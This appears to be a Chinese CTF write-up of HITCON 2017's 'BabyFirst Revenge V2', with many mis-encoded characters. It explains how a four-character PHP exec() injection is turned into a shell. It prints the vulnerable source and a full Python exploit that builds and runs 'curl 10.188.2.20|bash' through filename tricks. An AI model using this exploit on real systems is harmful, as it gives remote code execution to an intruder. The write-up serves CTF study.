[hitcon2017] BabyFirst Revenge V2復(fù)現(xiàn)

分享本題自制Dockerfile:Github

這題相比于上一題 條件更加的苛刻了 只允許執(zhí)行最多四個(gè)字符
源碼如下:

<?php
    $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']);
    @mkdir($sandbox);
    @chdir($sandbox);
    if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 4) {
        @exec($_GET['cmd']);
    } else if (isset($_GET['reset'])) {
        @exec('/bin/rm -rf ' . $sandbox);
    }
    highlight_file(__FILE__);

那我們之前的生成 ls -t>g 就不能按照最后一步 ls>>_ 來執(zhí)行了

但是我們能不能還是按照 生成命令段文件 最后通過ls來拼接命令執(zhí)行呢?

這里還是以分析Orange大大的exp為主:

Exp:

import requests
from time import sleep
from urllib import quote

payload = [
    # generate "g> ht- sl" to file "v"
    '>dir', 
    '>sl', 
    '>g\>',
    '>ht-',
    '*>v',

    # reverse file "v" to file "x", content "ls -th >g"
    '>rev',
    '*v>x',

    # generate "curl orange.tw|python;"
    # generate "curl 10.188.2.20|bash"
    '>\;\\', 
    '>sh\\', 
    '>ba\\', 
    '>\|\\', 
    '>20\\', 
    '>2.\\',
    '>8.\\', 
    '>18\\', 
    '>0.\\', 
    '>1\\', 
    '>\ \\', 
    '>rl\\', 
    '>cu\\', 

    # got shell
    'sh x', 
    'sh g', 
]


r = requests.get('http://10.188.2.20:17528/?reset=1')
for i in payload:
    assert len(i) <= 4
    r = requests.get('http://10.188.2.20:17528/?cmd=' + quote(i) )
    print i
    sleep(0.1)

首先生成 ls -t >g的命令文件,這里orange大大的方法真的巧妙到極致了!

  • 先了解一個(gè)小trick,*在Linux中代表的是0或多個(gè)字符,比如ls *.txt 就表示了列出本目錄下所有后綴名為txt的文件,那假如單獨(dú)執(zhí)行一個(gè)*會(huì)是什么效果?
    在本地嘗試了一下 直接輸入一個(gè)星號(hào)的話Linux首先會(huì)把當(dāng)前目錄下的所有文件按字典序排序一次,然后將排序的結(jié)果當(dāng)作命令執(zhí)行,如下:
    ??

    那下圖的也可以理解了:
    ??

    因?yàn)?o匹配了 echo 和o,而他們的排序是echo在前,o在后 所以就會(huì)執(zhí)行命令 echo o
  • 再認(rèn)識(shí)一下dir 這個(gè)命令在大多數(shù)系統(tǒng)中都是ls 的alias 但是有些系統(tǒng)中則沒有
    為什么我們要用這個(gè)命令呢 因?yàn)橹罢f過ls 是alphabetically (字典序)那么dir就會(huì)排在ls結(jié)果的最前面 所以我們*之后dir也是排在最前面 也就充當(dāng)了拼接文件名的角色

  • 大概思路就出來了 我們要構(gòu)造ls -t>g的命令片段成幾個(gè)文件名 但是其命令段的首字母不能在d的前面,也就是不能是 特殊符號(hào) 數(shù)字 abc 而且每一段不能超過兩個(gè)字符,因?yàn)槠溆鄡蓚€(gè)字符要分配給>和\,如果你嘗試一下構(gòu)造 正常來說是沒辦法構(gòu)造出無特殊符號(hào)打頭的文件名 他總會(huì)排到dir的前面,然后更巧妙的地方來了 我們可以生成逆序的命令拼接起來,最后使用rev命令反向文件中的字符串!

  • 根據(jù)之前我們對(duì)*的認(rèn)識(shí),我們可以將倒序的命令輸入到v文件中,因?yàn)?v能匹配rev 和 v,也就是執(zhí)行了 rev v命令,然后再將倒序之后的結(jié)果>x文件中,這樣*v>x剛剛好是四個(gè)字符!

  • 但是看到這里 你可能還會(huì)在嘗試過程中發(fā)現(xiàn)問題,那就是逆序之后的命令段應(yīng)該是 [dir,>sl,>g>,>t-] 那么這里會(huì)有一個(gè)問題 因?yàn)閠的字母序比s后,所以ls之后應(yīng)該是這樣的:


    Oops

    解決方法是加多一個(gè)參數(shù)h,在ls中h是用作格式化l參數(shù)之后的存儲(chǔ)量大小 使之更適合人類方式閱讀 但是如果ls只帶參數(shù)h的不帶參數(shù)l話那這個(gè)參數(shù)是毫無意義的 如圖:


    ??

    所以我們將>t-改成>ht-就能解決字典序的問題了
  • 接下來的問題就回到了babyfirst-revenge的情況了

參考:
https://github.com/orangetw/My-CTF-Web-Challenges

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖,帶你破解...
    沈念sama閱讀 230,563評(píng)論 6 544
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異,居然都是意外死亡,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 99,694評(píng)論 3 429
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人,你說我怎么就攤上這事。” “怎么了?”我有些...
    開封第一講書人閱讀 178,672評(píng)論 0 383
  • 文/不壞的土叔 我叫張陵,是天一觀的道長。 經(jīng)常有香客問我,道長,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 63,965評(píng)論 1 318
  • 正文 為了忘掉前任,我火速辦了婚禮,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 72,690評(píng)論 6 413
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著,像睡著了一般。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 56,019評(píng)論 1 329
  • 那天,我揣著相機(jī)與錄音,去河邊找鬼。 笑死,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播,決...
    沈念sama閱讀 44,013評(píng)論 3 449
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 43,188評(píng)論 0 290
  • 序言:老撾萬榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 49,718評(píng)論 1 336
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 41,438評(píng)論 3 360
  • 正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 43,667評(píng)論 1 374
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情,我是刑警寧澤,帶...
    沈念sama閱讀 39,149評(píng)論 5 365
  • 正文 年R本政府宣布,位于F島的核電站,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 44,845評(píng)論 3 351
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧,春花似錦、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 35,252評(píng)論 0 28
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 36,590評(píng)論 1 295
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 52,384評(píng)論 3 400
  • 正文 我出身青樓,卻偏偏與公主長得像,于是被迫代替她去往敵國和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 48,635評(píng)論 2 380

推薦閱讀更多精彩內(nèi)容